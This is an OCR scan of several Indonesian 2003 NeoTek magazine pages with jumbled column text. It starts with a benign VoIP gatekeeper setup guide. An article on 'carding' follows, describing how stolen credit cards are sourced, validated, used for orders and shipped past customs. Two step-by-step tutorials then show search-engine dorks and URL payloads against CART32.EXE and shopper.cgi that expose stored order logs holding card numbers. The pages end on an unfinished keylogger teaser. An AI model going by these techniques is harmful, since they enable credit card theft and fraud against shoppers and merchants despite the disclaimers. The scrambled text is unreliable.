3. pindah ke /usr/local/src
Bagi pengguna Windows, anda dapat mengoperasikan 4. tar zxvf gk-2.0a-linux-bin.tgz
gatekeeper tersebut di mesin Windows dan juga dapat di 5. cd openh323gk
operasikan berdampingan dengan software proxy yang 6. cd bin
ada seperti Wingate atau Winroute. Sayangnya Windows 7. cp gnugk /usr/bin
rentan sekali dengan virus dan tidak seandal Linux untuk 8. cp lib* /usr/lib
dioperasikan sebagai server. 9. atau cp lib* /lib
Langkah instalasi di Windows sebetulnya lebih mudah 10. contoh file konfigurasi adalah di folder
daripada di Linux: /usr/local/src/openh323gk/etc.
1. copykan gk-2.0.2-windows-bin.zip ke salah satu direk- Anda yang menggunakan Linux Mandrake 9.0 dapat meng-
tori, misal D:\temp. gunakan openh323 gatekeeper versi 2.0.2 tanpa masalah
2. ekstrak gk-2.0.2-windows-bin.zip menggunakan Winzip. berarti. Agak berbeda dengan versi 2.0a, pada versi 2.0.2
3. akan terlihat folder D:\temp\openh323gk\ tidak ada file lib*, anda cukup menginstal openh323 di Li-
4. File gnugk.exe terdapat di folder D:\temp\openh323gk\ nux Mandrake 9.0 untuk menggantikan lib* yang dibu-
bin\ tuhkan. Sisa proses instalasi tidak berbeda dengan versi 2.0a.
5. File-file contoh konfigurasi ada di folder Pada titik ini anda bisa menjalankan gnugk dengan cara
D:\temp\openh323gk\etc\ mengetikan
Pada titik ini anda dapat masuk ke D:\temp\openh323gk\ gnugk -h
bin\ dan menjalankan gnugk dengan mengetikkan
untuk melihat semua perintah command line yang didukung.
gnugk -h
Bagian yang akan membuat kepala pusing adalah menset
untuk melihat semua perintah command line yang didukung. parameter dari file konfigurasi yang akan saya terangkan
Bagian yang akan membuat kepala pusing adalah menset dibawah. Jika telah selesai menset konfigurasi file-nya
parameter dari file konfigurasi yang akan saya terangkan maka bisa diletakan di /etc, misalnya dengan nama
dibawah. Jika telah selesai menset konfigurasi file-nya warnetvoip.ini. Selanjutnya gatekeeper dapat dijalankan

16 NeoTek Februari 2003


NeoTekno

secara otomatis dengan memasukkan line di bawah ini Name=Proxy_Warnet_Anda


pada line terakhir di /etc/rc.d/rc.local sebagai TimeToLive=600
[RoutedMode]
/usr/bin/gnugk -c /etc/warnetvoip.ini & GKRouted=1
pada saat proses debugging ada baiknya menjalankan gnugk H245Routed=0
dari console dengan mengaktifkan trace sbb: CallSignalPort=1721
CallSignalHandlerNumber=2
/usr/bin/gnugk -ttt -c /etc/warnetvoip.ini RemoveH245AddressOnTunneling=1
DropCallsByReleaseComplete=1
perhatikan bahwa tanda & tidak digunakan agar tidak SupportNATedEndpoints=1
dijalankan di background dan kita bisa melihat trace Q931PortRange=30000-39999
message untuk proses debugging kerja dari gatekeeper. H245PortRange=40000-49999
Pada saat gatekeeper di operasikan, seorang operator da- [Proxy]
pat dengan mudah memonitor operasi sebuah gatekeeper Enable=1
InternalNetwork=192.168.0.0/24
dengan cara masuk ke mesin gatekeeper menggunakan T120PortRange=50000-59999
telnet pada status port 7000, tentunya juga diizinkan. Me- RTPPortRange=50000-59999
lalui status port tersebut, seorang operator dapat melihat
[Endpoint]
aktivitas gatekeeper misalnya siapa saja yang sedang re- Gatekeeper=111.222.333.444
gistrasi ke gatekeeper yang kita operasikan, hubungan Type=Gateway
komunikasi/telepon mana yang sedang dilangsungkan dsb. H323ID=Proxy_Warnet_Anda
E164=01112511234599
Operator proxy server, seperti Warnet, kantor dll. Prefix=011125112345
Jika anda operator dari proxy server di Warnet atau TimeToLive=900
RRQRetryInterval=10
kantor, maka bagian ini untuk anda. ARQTimeout=2
Agar sebuah gatekeeper dapat di operasikan sebagai proxy [RasSvr::RewriteE164]
VoIP berdampingan dengan program proxy lainnya, se- 62111=0111
perti squid (di Linux) atau Wingate / Winroute (di Win- [GkStatus::Auth]
dows), anda perlu melihat file /usr/local/src/openh323gk rule=allow
/etc/proxy.ini dan child.ini sebagai referensi untuk
membuat file konfigurasi warnetvoip.ini. Operator gatekeeper di Internet
Dari contoh konfigurasi proxy.ini anda perlu mencuri Secara umum proses instalasi gatekeeper di Internet tidak
terutama section [Proxy] dan setting secara benar, berbeda dengan proses instalasi gatekeeper di proxy server
di Warnet/kantor. Yang berbeda sangat jauh adalah isi
InternetNetwork= konfigurasi file-nya. Bagi anda yang penasaran silakan
Dari child.ini anda perlu mencuri terutama section dilihat secara detail di bagian operator proxy server di atas.
[Endpoint] & setting secara benar, Peralatan yang dibutuhkan untuk sebuah gatekeeper tidak
Gatekeeper= (ini gatekeeper di ISP atau di IIX) terlalu besar, tentunya sangat bergantung pada jumlah
E164= endpoint dan call/detik yang harus di-handle. Untuk
Prefix= meng-handle sekitar 200-an endpoint dan 3-5 call/detik
Dimana sesuai dengan usulan di atas maka contoh mungkin sebuah PC
E164 = 0111 251 12345 00 Kelas Pentium II
Prefix = 0111 251 12345 64Mbyte RAM
2 Gbyte disk
Untuk nomor di daerah Bogor (251) yang 5 digital awal
nomor telkom-nya adalah 12345. cukup untuk di terjunkan sebagai gatekeeper, tentunya
PC dengan spesifikasi di atas itu dapat meng-handle
Untuk memudahkan hidup anda, saya sertakan di bawah kapasitas yang lebih besar lagi.
contoh warnetvoip.ini sebagai referensi. Mohon diperha-
tikan bahwa gatekeeper pada proxy server di warnet atau Beberapa contoh file .ini pada /usr/local/src/openh323gk/etc
di kantor akan meregistrasikan dirinya ke gatekeeper yang perlu diperhatikan oleh operator gatekeeper agar
yang berada di ISP atau di IIX sebagai gateway, bukan dapat beroperasi secara baik adalah minimal sekali file sbb:
sebagai gatekeeper untuk memudahkan integrasi ke gnugk.ini
jaringan. neighbor.ini
Perhatikan saya menggunakan huruf tebal pada bagian- tentunya bagi anda yang berpikiran maju silakan melihat
bagian yang perlu anda sesuaikan dengan parameter/ file-file yang lain. Untuk mempersingkat diskusi, saya
kondisi jaringan anda. sertakan sebuah contoh file gatekeeper.ini yang disiapkan
## untuk sebuah gatekeeper yang masuk ke dalam jaringan
## This example shows how to use the gatekeeper as an H.323 proxy. gatekeeper. Beberapa parameter yang diberi garis bawah
## harus diganti, d sesuaikan dengan kondisi jaringan yang ada.
## Suppose the host of the gatekeeper has two network interfaces:
## Perhatikan entry,
## WAN : Menggunakan WLAN
## LAN : IP=192.168.0.1 Network=192.168.0.0/24 [RasSvr::Neighbors]
## GatekeeperIDAnda=202.111.222.161:1719;011102212345
## A proxy gatekeeper is usually register with a parent gatekeeper as a
## gateway. See child.ini for the configuration. Harus di-share dengan gatekeeper lain yang beroperasi di
## jaringan agar saling mengenal dan dapat beroperasi seba-
[Gatekeeper::Main] gai jaringan gatekeeper dan melakukan registrasi nomor
Fourtytwo=42 satu sama lain. Perhatikan prefiks yang digunakan harus

Februari 2003 NeoTek 17


NeoTekno

benar agar jaringan dapat beroperasi dengan baik. Mohon biasa; hanya dapat dihubungkan ke PABX/PBX maupun
para operator gatekeeper untuk dapat berkoodinasi dengan langsung ke saluran telkom melalui konektor RJ-11.
saya di Internet melalui onno@indo.net.id untuk mengkoor- Ada beberapa vendor yang memproduksi peralatan gate-
dinasikan proses sharing informasi antar gatekeeper ini. way VoIP ini, salah satu yang kebetulan saya familiar ada-
Untuk mengantisipasi sambungan Internasional dari jaring- lah dari Planet (www.planet.com.tw) yang di distribusikan
an VoIP Merdeka ke jaringan telepon internasional, ada oleh Corexindo di Mangga Dua.
baiknya semua gatekeeper di jaringan VoIP Merdeka me- Operasi gateway VoIP tidak terlalu sulit karena setting
rewrite nomor prefiks 62111 menjadi 0111 dalam parameternya dapat dilakukan melalui Web maupun tel-
perintah net dengan menggunakan text mode. Logika berfikirnya
[RasSvr::RewriteE164] tidak berbeda jauh dengan setting gatekeeper di atas.
62111=0111 Sebagai contoh untuk Internet Telephony Gateway (ITG)
dari Planet menggunakan text mode dapat diset agar:
# Entry agar dapat menjadi bagian jaringan Gatekeeper VoIP Merdeka
# set h323 gk_mode manual
# Anda harus mengganti GatekeeperID dengan ID yang anda inginkan set h323 gk_addr 202.111.222.123
# misalnya APJIIGK, KantorGK, RTRWNetGK, GK1, GK2, dll … set h323 endpoint_prefix 011125212345
# dua entry di bawah harus di share dengan rekan lain di
# jaringan gatekeeper set h323 term_id ITG_percobaan
# set h323 gk_id GatekeeperIDAnda
# [RasSvr::Neighbors]
# GatekeeperID=202.111.222.161:1719;011102212345 Tentunya parameter H323 di atas hanya khayalan, anda
# harus menyesuaikan dengan kondisi sebenarnya dari
# [EndPoint] jaringan VoIP yang ada.
# Prefix=011102212345
#
[Gatekeeper::Main]
Fourtytwo=42
Name=GatekeeperGK
# Prefix=011102212345
TimeToLive=600
[RoutedMode]
GKRouted=1
H245Routed=0
CallSignalPort=1721
CallSignalHandlerNumber=2
RemoveH245AddressOnTunneling=1
DropCallsByReleaseComplete=1
SupportNATedEndpoints=1
Q931PortRange=30000-39999
H245PortRange=40000-49999
[RasSvr::Neighbors]
APJIIGK=111.222.333.444;*
GK1=202.159.123.162:1719;011122450
GK2=202.123.111.222:1719;011121250
GK3=202.154.222.111:1719;0111251678
GK4=167.205.123.111:1719;* Bagi anda yang agak alergi menggunakan text mode, da-
pat juga menset-nya dengan menggunakan Web. Pada
[EndPoint]
Prefix=011102212345 VoIP gateway Planet fasilitas setting melalui Web juga di
sediakan. Tampak pada gambar adalah bagian setting gate-
[RasSvr::RewriteE164]
62111=0111
keeper di VoIP gateway Planet. Tapi dari pengalaman saya
pribadi, menset menggunakan text jauh lebih memung-
[GkStatus::Auth]
rule=allow
kinkan kita untuk menset berbagai parameter dibanding-
kan melalui Web.
End user yang menggunakan peralatan gateway VoIP Masih banyak lagi fasilitas yang dapat di set dengan
menggunakan sebuah ITG, beberapa parameter di atas
Gateway VoIP adalah peralatan yang dapat menghubung-
cukup untuk meregistrasi ITG anda ke sebuah gatekeeper
kan VoIP di Internet dengan jaringan telepon yang meng-
untuk di kenali nomor-nya. Tentunya di pihak gatekeeper
gunakan sambungan RJ-11. Biasanya peralatan gateway
dapat juga meregistrasikan secara manual sebagai
VoIP ini di sambungkan ke PBX/PABX di kantor atau di
permanent endpoint jika diinginkan.
wartel agar telepon biasa yang ada dapat terkait ke jaring-
an VoIP juga. Teknik yang lumayan membuat pusing kepala adalah
menyambungkan Internet Telephony Gateway (ITG)
Operasi VoIP yang akan sangat menantang dan dapat ber-
melalui port FXO ke peralatan PABX supaya telepon dari
benturan dengan pemerintah terutama jika anda menggu-
Internet, baik dari NetMeeting maupun dari ITG lain
nakan peralatan VoIP gateway dan menyambungkannya
dapat terhubung ke telepon biasa.
ke jaringan Public Switch Telephone Network (PSTN)
milik Telkom melalui peralatan PABX. (Private Automat- Jika anda cukup jeli teknik ini dapat dikembangkan agar
ed Branch Exchange). Biasanya peralatan VoIP gateway nomor telepon Telkom, seperti 022 2504567, di tempat
memiliki dua jenis port, yaitu: anda dapat dikenali di jaringan VoIP Merdeka dan dapat
ditelepon langsung melalui jaringan VoIP Merdeka tanpa
• FXS—yang digunakan untuk dihubungkan langsung ke
perlu melalui Telkom sama sekali. „
pesawat telepon biasa melalui konektor RJ-11.
• FXO—yang tidak dapat dihubungkan ke pesawat telepon

18 NeoTek Februari 2003


NeoTekno

E-COMMERCE SECURITY
Modus Operandi Carding
Lahirnya e-commerce melahirkan pula teknik-teknik yang merupakan risiko terhadap bisnis e-commerce. Selain
rawan terhadap pencurian database, situs e-commerce juga rawan terhadap credit card fraud yang lebih
dikenal sebagai carding. Seluk beluk carding bukan teknologi semata-mata, melainkan juga social engineering.

EBAGAI DAMPAK DARI MELUASNYA TEKNOLOGI Inter-


S net, salah satu efeknya adalah terjadinya “kena-
kalan” di Internet. Istilah hacking, phreaking,
cracking dan carding, menjadi populer sejalan dengan
popularitas istilah Web, email, chating. Bagi sebagian
orang sulit untuk membedakan kenakalanan model baru
ini. Secara mudahnya, tiga istilah di depan lebih terkait
dengan perusakan infrastuktur komputer, jaringan,
software dan Internet.
Untuk dikategorikan sebagai kejahatan, ketiganya masih
ambigu karena ada juga pelaku yang bertujuan mulia, se-
bagai uji coba keamanan jaringan misalnya, sehingga
pemberian label kejahatan lebih bergantung pada maksud
dan tujuannya.
Lain halnya dengan carding, yang satu ini merupakan
efek langsung dari ketiganya. Label “kejahatan” layak
diberikan kepada pelaku carding, karena prinsipnya sama
persis dengan maling, pencuri ataupun copet serta korup-
tor. Hanya saja media yang digunakan lebih canggih, dan
belum terjangkau hukum formal serta terjamah aparat
hukum. Berikut paparan pengantar tentang carding.
• “Portal” carder Indonesia (www.geocities.com/yogyacarding/
Latar belakang blackapril.htm) didedikasikan bagi para carder Indonesia. Di sini selain
Manifesto Carder, anda akan menjumpai pula informasi pada menu
Tidak sedikit pelaku carding berawal dari sekedar iseng,
History, Info Online Shop, dan Tips & Tricks Carding. Hati-hati dengan
mencoba peruntungannya. Meski tidak ada statistik resmi
Download sebab ada program yang konon tanpad disadari dapat
tentang hal ini, tetapi sepengamatan penulis merekalah
memformat hard disk anda.
yang paling banyak. Rata-rata frekuensi browsing mereka
di Internet masih minim, dan sekedar mencari tahu saja. balas dendam, registrasi memasuki komunitas tertentu,
Ada anggapan sebagian orang yang mau dianggap jago dan lain sebagainya. Pelaku ini biasanya terpelajar—
Internet bila sudah mampu membobol kartu kredit orang paham komputer, Internet dan jaringan—dan sedikit
yang sudah diamankan sedemikan rupa. Yang satu ini me- jumlahnya.
rupakan pernyataan keblinger dari orang yang mencoba
menjadi hacker—dan biasanya mereka mengaku-ngaku Tujuan
sebagai hacker bukan carder. Sebetulnya ini merupakan 1. Secara konvensional pelaku bertujuan mendapatkan
pernyataan aktualisasi diri di Internet. barang yang diinginkan.
Diakui ataupun tidak, budaya hedon atau mudahnya “bu- 2. Ada pula yang bermaksud mendapatkan uang secara
daya kepinginan” akibat provokasi konsumerisme dari langsung. Prisnsip kerjanya kurang lebih sama dengan
iklan (baca: media) membuat sebagian orang mencari ja- yang pertama hanya saja secara spesifik dilakukan:
lan pintas untuk memperoleh barang yang dimau hanya Teknik Refund. Pesanan sengaja dibatalkan, (pembatalan
bermodalkan biaya koneksi warnet. langsung, alamat pengiriman asal sehingga barang
Sebagian dari pengangguran produktif yang tidak tersalur kembali ke pengirim, mengaku alamat pengiriman sedang
mencoba peruntungan dan menyalurkan keahliannya di kosong karena sedang ada di luar negeri, dan lain
bidang ini. Sepengamatan penulis, ada banyak sarjana sebagainya) sehingga dana yang sudah diambil merchant
yang masih menganggur memanfaatkan lahan basah ini dapat diminta kembali untuk dikirim lewat check, pay
sebagai mata pencarian. Bila dipakai tolok ukur dengan pall, atau moneygram dan rekening bank.
sejumlah pegawai dotkom dan dotnet yang dirumahkan Penjualan secara online atau lewat lelang tertutup di
tempo hari, agaknya hal ini cukup signifikan dengan komunitas tertentu.
kesempatan kerja dibidang IT langka dengan tenaga ahli.
3. Tidak sedikit orang Indonesia yang ingin memiliki fasi-
Ada juga pelaku yang memiliki tujuan tertentu, misal

Februari 2003 NeoTek 19


NeoTekno

litas mewah yang disediakan di Internet, untuk itu kartu tubies, kondom, viagra, alat bantu sex, majalah porno.
kredit curian digunakan untuk mendapatkan account Pertimbangan khusus untuk memilih barang adalah:
khusus pada situs judi, porno. Privelege untuk dapat me-
masuki koneksi sebuah server dan simulator. Tidak tertu- • Mudah dikeluarkan oleh pabean, secara fisik tidak
tup juga nomor kartu kredit tersebut digunakan untuk mencolok dan mencurigakan.
membeli lisensi software atau UNIX Shell. Sementara itu • Pajak tidak tinggi, terkait dengan pembayaran yang nan-
bisnis penjualan domain dan pemanfaatan hosting yang tinya dibayarkan oleh pemesan. Untuk itu perlu penge-
membutuhkan pembayaran kartu kredit, menjadi lahan tahuan tentang perpajakan dan biasanya hal ini diterang-
yang menjanjikan untuk meraup rezeki, meski ada juga kan oleh pihak shipment atau bea cukai.
yang digunakan untuk kepentingan domain sendiri.
• Target situs belanja. Alat bantu pertama yang diguna-
Cara kerja kan adalah search engine, bisa Google, Altavista, Buyer
Sendiri, tipe single figthter biasanya merupakan pemula
Index dan lainnya. Cukup ketikkan kata kunci jenis ba-
atau mereka yang memang sudah ahli sehingga tidak rang yang diinginkan, maka akan keluar ratusan bahkan
memerlukan bantuan. ribuan situs. Tinggal dipilah-pilah mana yang cocok dan
yang tidak.
Berkelompok, kumpulan carder yang bekerja sama dalam
satu komunitas tertentu. Kelompok ini bisa secara fisik Otentifikasi
berdekatan bisa pula secara virtual, secara fisik berjauhan. Kartu kredit. Kartu kredit yang diperoleh meskipun fresh
Kelebihan mereka yang berkumpul adalah selalu terse- belum tentu siap pakai. Untuk itu carder profesional perlu
dianya informasi nomor kartu kredit baru, situs baru, melakukan otentifkasi bertingkat dengan cara:
teknik-teknik pengamanan, dan lain sebagainya. Di sini
dimungkinkan adanya pembagian tugas, semisal pencari 1. Melakukan generate pada software generator, dan akan
kartu kredit baru, situs baru, pengorder barang, negosia- ditemukan informasi
tor, penjual, bahkan translator bagi yang tidak paham • Card issue -bank yang mengeluarkan
bahasa tertentu. Kelompok ini sangat solid, bahkan sam- • Area alamat pemegang kartu kredit yang diidentifikasi
pai pada pembagian hasil, bila ada yang nyeleweng tak dengan kombinasi nomor kartu kredit yang mengarah
segan mereka secara kejam “menyiksa” si pelaku, baik pada kode pos. Dari sini bisa dibuat nama, alamat, nomor
secara fisik maupun mental. telepon pemilik kartu secara fiktif oleh software.
Metode Pencarian • Nomor kartu kredit lain yang se card issue, yang bisa
dijadikan alternatif bila nomor kartu ini ditolak.
Lokasi akses yang paling strategis adalah warnet, dengan
alasan klasik sulit dilacak. Ada pula pertimbangan lain, 2. Validasi kartu kredit, biasanya secara online pada situs
misal pemilik dan operator mau diajak kerja sama—syu- porno, judi, underground. Yang lebih profesional me-
kur kalau mau tempatnya dijadikan alamat tujuan pengi- manfaatkan situs pengembangan software security yang
riman—pengamanan komputer dan bandwidth warnet membutuhkan donasi, kalau yang satu ini validasinya
yang tidak ketat. bisa 100%, cukup sumbang $2 saja.
Situs target. Faktor penentu keberhasilan belanja dimulai
Kartu kredit yang memenuhi kriteria disini, beberapa pertimbangan carder untuk memilih situs
• Milik orang asing. Haram dan bodoh hukumnya mema- belanja yang nyaman adalah:
kai kartu kredit dari Indonesia, kecuali kalau mau untuk
ditukarkan dengan nomor asing. • Mau mengirim ke luar negeri, terutama Asia, syukur
ada option Indonesia.
• Masa berlaku masih lama agar dana yang tersedia ma-
sih banyak dan tidak mendekati limit • Pembayaran online yang realtime, dengan otentifikasi
seadanya tanpa perlu mengirim balik foto copy kartu
• Bank yang mengeluarkan minimal pernah didengar na- kredit yang dipergunakan.
manya karena ada juga merchant yang tidak mau mene-
rima kartu dari bank tertentu. • Bukan merupakan afiliasi dari usaha serupa di
Indonesia.
• Prioritas untuk mendapatkan kartu VISA, baru Master-
card, Amex, Diner dan lain sebagainya. • Pilihan metode shipment (pengiriman) yang banyak,
dan tidak terikat.
Ada beberapa cara yang dilakukan untuk memperoleh
kartu kredit Mengatasi pengamanan ekstra dan metode
• Mendapat setoran nomor kartu kredit [fresh !] dari pembayaran lain
orang yang bekerja di hotel, cafe, restoran, travel agent Mengakali alamat
dan tempat yang banyak dikunjungi orang asing.
Bukan rahasia lagi kalau tujuan pengiriman Indonesia
• Bertukar di room chat IRC kini sulit dilakukan. Biasanya pemesanan menuliskan
• Menjebol situs belanja dengan dengan skrip tertentu, tujuannya negara lain tapi dengan tetap mempergunakan
berkolusi dengan webmaster yang sakit hati, atau mencari kode pos Indonesia. Metode ini manjur karena shipment
kelemahanannya yang lain. melakukan verifikasi dengan melalui kode pos yang
sudah pasti keunikan nomornya, apalagi bila database
Target barang yang dibelanjakan alamat kota dan jalannya terdapat di kode pos tersebut.
Biasanya barang-barang tersebut tidak ada di Indonesia, Ada beberapa metode pengamanan ekstra pada situs ter-
atau sulit didapat, mahal, perlengkapan khusus (otomotif, tentu. Di antaranya adalah keharusan untuk mengirim-
olah raga, hobbies, buku, software, kebutuhan medis). Ada kan foto copy kartu kredit bolak balik beserta tanda ta-
sebagian kecil yang iseng memesan coklat, boneka Tele- ngan dan social security number (KTPnya orang Ame-

20 NeoTek Februari 2003


NeoTekno

rika). Para carder yang sudah kebelet biasanya melakukan • Ambil di kantor shipment agent, cara paling nekat
olah image lewat sofware pengolah image (macam Photo- adalah menjemput bola. Resiko tertangkap sangat besar
shop). Tinggal capture atau scan kartu kredit asli lalu bila tidak memiliki "orang dalam".
kotak-katik, print, image siap untuk dikirim melaui fax
atau emai, bergantung permintaan. Penjualan
Metode pembayaran lainnya adalah dengan penggunaan Antar teman offline. Umum dilakukan untuk menutup
e-wallet, paypall, check, moneygram. Biasanya carder pe- terjadinya penipuan, atau malah paling apes jebakan yang
mula malas melakukan metode pembayaran ini, karena berakhir penangkapan dari aparat.
ruwet dan berbelit. Tapi bila ini berhasil, transaksinya bisa Antar teman online. Biasanya shipment dibelokkan lang-
mencapai puluhan ribu dolar. Caranya dengan mendaftar sung oleh pemesan ke yang bersangkutan. Kompensasi
pada situs yang menyediakan layanan tersebut, setelah bisa uang, barang lain, atau jasa (mis; pembuatan situs,
sebelumnya menyediakan sejumlah nomor kartu kredit account, image kartu kredit palsu, “pelacuran,” dan lain
yang valid 100%, nomor social security, rekening bank. sebagainya) bergantung lokasi teman online.
Teknik order Masuk counter barang yang spesifik, misal sebuah laptop
dijual ke main dealer dengan harga non garansi.
Web based, merupakan hal umum yang dilakukan dan
tidak terlalu sulit. Akibat pada bangsa
E-Mail order, dimanfaatkan bagi situs yang tidak menye- Kenakalan internet yang mengarah pada kriminal ini
diakan transaksi web -web hanya sebagai galeri, atau membuahkan hasil, yang tidak terpikirkan akibatnya
tidak memberi pilihan untuk pengiriman keluar negeri, ke oleh para pelaku, yaitu;
Asia, apalagi Indonesia. Untuk itu kemampuan berbahasa
• IP address Indonesia diblokir untuk transaksi dan
asing terutama Inggris amat diperlukan disini, apalagi bila
memasuki situs tertentu.
terpaksa harus bernegosiasi untuk meyakinkan merchant.
• Kartu kredit dari Indonesia diblokir.
Fax order, secara prisip hampir sama dengan mail order, • Integritas pebisnis Indonesia turun.
hanya saja biasanya merchant tidak menerima internet
Secara langsung saat ini mungkin pelaku tidak merasakan
fax, untuk melacak alamat nomor tujuan. Untuk meng-
dampaknya. Namun pada masa mendatang bangsa yang
atasi ini, carder bekerja sama dengan pihak wartel. Jenis
sudah terpuruk ini semakin terpuruk lagi akibat ulah
belanjaan pada metode ini umumnya grosir, dan transaksi
segelintir oknum pengguna Internet. Apa jadinya jika
yang terjadi juga besar, bisa mencapai puluhan ribu dollar.
Indonesia tidak ada lagi koneksi Internet. Jelas tidak
mungkin kita hanya saling berhubungan internet hanya
Konfirmasi melalui jalur IIX, dan tidak mendapat koneksi global.
Wajib hukumnya untuk melakukan konfirmasi setelah Hanya kesadaran moral saja yang dapat menghentikan-
belanja, bahkan pada saat belanja betulan. Hal ini berguna nya, karena lemahnya perangkat dan aparat hukum.
untuk memberikan instruksi
Removal tag. Mencopot semua label yang terkait dengan
harga agar pihak bea cukai kesulitan memberikan
estimasi pajak yang berdasarkan harga barang, sehingga
biaya pajak bisa dinegosiasikan atau syukur malah kalau
ditiadakan. Bisa juga barang tersebut diakui sebagai
barang bekas, hadiah, pengiriman kembali karena
komplain.
Pengepakan. Siasat ini juga untuk mengelabui bea cukai
dan shipment, agar pajak dan asuransinya menjadi lebih
murah. Misalnya adalah mengepak perhiasan dalam
boneka atau membungkusnya bersama buku bekas.
Permintaan track number, dapat untuk mengetahui
• Jalur perjalanan barang. Menariknya di sini sering ter-
jadi saling bajak antar carder. Jadi ada carder lain yang
mengklaim barang tersebut dan memindahkan alamat
pengiriman.
• Oknum yang bisa disuap; bea cukai, pegawai pos,
pegawai shipment, polisi
Penerimaan barang
• Diantar ke alamat pemesan, sama seperti barang
kiriman umumnya, hanya saja biasanya dilakukan secara
sembunyi-sembunyi atau diluar jam kerja karena
penerima takut bila ternyata kurir pengirim dibuntuti
aparat.
• Ambil di tempat tertentu, setelah mengadakan • BlackApril “mengungkapkan” identitasnya sebagai carder lewat situs
perjanjian sebelumnya dengan kurir, ditentukan tempat Web-nya (www.geocities.com/yogyacarding/blackapril.htm). Anda
tertentu yang biasanya ramai atau malahan sulit berniat menjadi carder? Silakan mengikuti kursus kilat melalui situs
diketahui. Yogyacarding ini.

Februari 2003 NeoTek 21


NeoTekno

E-COMMERCE SECURITY
etelah anda banyak mendengar
S tentang carding, mungkin timbul
pertanyaan, bagaimana cara orang
mendapatkan akses kartu kredit tersebut.

MEMANFAATKAN Artikel ini berusaha menjelaskan salah satu


cara itu, tetapi bukan dimaksudkan untuk
mengajak anda menjadi carder.

KELEMAHAN CART32.EXE Salah satu cara yang dapat digunakan adalah


memanfaatkan kelemahan CART32.EXE
dengan menggunakan unicode bug “error,
expdate, dan lain sebagainya.”
Bagaimana cara “mengintip” nomor kartu kredit yang digunakan Web yang menyediakan layanan belanja
peselancar ketika melakukan transaksi online? MA Rody Candera secara on-line menggunakan cart32.exe
(odyxb@melva.org) mencoba menjelaskan salah satu caranya untuk dapat memproses transaksinya di
internet yang menggunakan kartu kredit.
untuk anda, sebagai pengetahuan bukan untuk dipraktikkan. Dari sana orang mendapat akses kartu kredit
dengan cara masuk ke dalam sistemnya.

Mengungkap field tersembunyi yang berisikan informasi transaksi, termasuk nomor credit card!

MENENTUKAN TARGET HASIL PENCARIAN MENAMBAHKAN EXPDATE


1 Cari target dengan memanfaatkan
search engine dengan keyword
2 Perhatikan hasil pencarian search
engine tersebut. Lihat Web ad-
3 Copy address itu, lalu paste di browser
anda pada bagian Address. Di akhir
CART32.EXE. Alur web address dress yang berada di bawah (hasil address itu tambahkan expdate
yang dijadikan target kurang lebih: pencarian pada Google, Web Lengkapnya: www.ipxxxxxire.
www.target.com/cgi-bin/cart32.exe address berwarna hijau). com/cscr-32/cart32.exe/expdate
Tidak ada spasi pada addressitu.

TRANSAKSI PADA WEB


5 Sampai di sini, cari file (data tran-
saksi disimpan) yang memiliki alur
sebagai berikut:
1. xxx-orders.txt
2. xxx-xxx.log
3. xxx.c32
File tersebut di cari di sub Cart32
Setup Info and Directory.
Untuk melihat transaksi yang ter-
simpan, copy file tersebut ke ba-
gian akhir dari web address tetapi
tulisan exe pada cart32.exe
dihapus. Sehingga lengkapnya:
www.target.com/cgi-bin/cart32/
xxx-xxx.c32.
JIKA BERHASIL berdasarkan web address contoh:
4 Tidak semua hosting mempunyai
kelemahan yang sama, mungkin te-
www.ipxxxxxire.com/cscr-32/
cart32/xxx-xxx.c32
lah di-path. Jika anda mendapati cart32.exe mempunyai field-field tersembunyi
Jika dijalankan, akan terlihat
hosting yang telah di-path, cari target yang menyimpan informasi seperti harga, berat,
tampilan transaksi yang pernah
lain. Tetapi jika berhasil, anda akan jumlkah, dan identifikasi dalam source code
terjadi pada Web tersebut
melihat tampilan Web seperti HTML-nya. Di sinilah letak kelemahan aplikasi
gambar di atas. shopping cart ini.

22 NeoTek Februari 2003


NeoTekno

elain cart32.exe, shopper.cgi pun

E-COMMERCE SECURITY S mempunyai kelemahan yang dapat


dimanfaatkan carder. Kembali
ditegaskan, artikel ini dimaksudkan sebagai

MEMANFAATKAN pengetahuan, bukan untuk dipraktikkan.


Shopper..cgi adalah program untuk memban-
tu memproses transaksi belanja online de-

KELEMAHAN SHOPPER.CGI ngan kartu kredit sebagai alat pembayaran.


Pada shopper..cgi, kembali digunakan uni-
code bug untuk dapat masuk ke dalam
sistem tempat menyimpan data transaksi.
Unicode bug kembali digunakan untuk mengungkap informasi Teknik dan langka untuk shopper..cgi lebih
tersembunyi pada aplikasi shopping cart. MA Rody Candera pendek dibandingkan cart32.exe. Unicode
(odyxb@melva.org) membahas kelemahan pada shopping cart bug yang digunakan &template=order.log
dan jika berhasil masuk anda akan langsung
lain, yaitu shopper.cgi. melihat catatan transaksi online yang
menggunakan kartu kredit.

Shopper.cgi membukakan jendela bagi anda...

Informasi Lebih lanjut


Ingin mendapatkan informasi lebih
lanjut mengenai e-commerce
www.target.com/cgi-
security? Hubungi langsung para
local/shopper.cgi?preadd=action&key=... penulis di situs Neoteker Official
www.target.com/cgi-bin/shopper.cgi?preadd=action&key=...
www.target.com/cgibin/shopper.cgi?preadd=action&key=...
Portal di sini:
http://neotek.portal.dk3.com/
Selain artikel kiriman para neoteket,
portal ini juga menjadi arsip dari
kegiatan tutorial online di channel
#neoteker Dalnet mengenai banyak
hal mengenai teknologi informasi,
ALUR WEB ADDRESS HASIL PENCARIAN khususnya network security.
1 Kembali gunakan search engine
di Yahoo atau Google dengan
2 Perhatikan hasil search engine
yang digunakan. Lihat Web
Artikel mengenai e-commerce secu-
keyword: cgi-bin/shopper.cgi address di bagian bawah dari
rity, khususnya kelemahan cart32.exe
dan alur Web address untuk setiap hasil pencarian. dan shopper.cgi telah dibahas dalam
target kita adalah seperti gambar channel ini dan dimuat sebagai arsip
di atas. dalam portal di atas.

MENEMPATKAN ADDRESS JIKA BERHASIL


3 Copy web address tersebut, dan
paste di browser anda di bagian
4 Selanjutnya anda dapat melihat
sendiri catatan transaksi belanja
address, dan tambahkan on-line dengan kartu kredit
unicode bug-nya sebagai alat pembayaran di
&template=order.log di bagian Internet pada Web tersebut.
akhir address. Tidak ada spasi
dalam penulisan address.

Februari 2003 NeoTek 23


NeoStyle

AKSI SPIONASE KEYLOGGER


ata-mata ada di sekitar
M kita. Salah satu perangkat
yang dapat berfungsi
sebagai program spionase adalah

PC ACME NET keylogger. Dan bisa jadi program


ini telah bertebaran dan dipasang
pada komputer-komputer yang
dipakai oleh orang banyak, dengan
tujuan untuk memantau dan
mencuri data.
Artikel ini membeberkan satu pro-
Anda dapat menggunakan keylogger sebagai “mata-mata” untuk gram yang cukup andal untuk ma-
salah spionase ini. Dengan tujuan
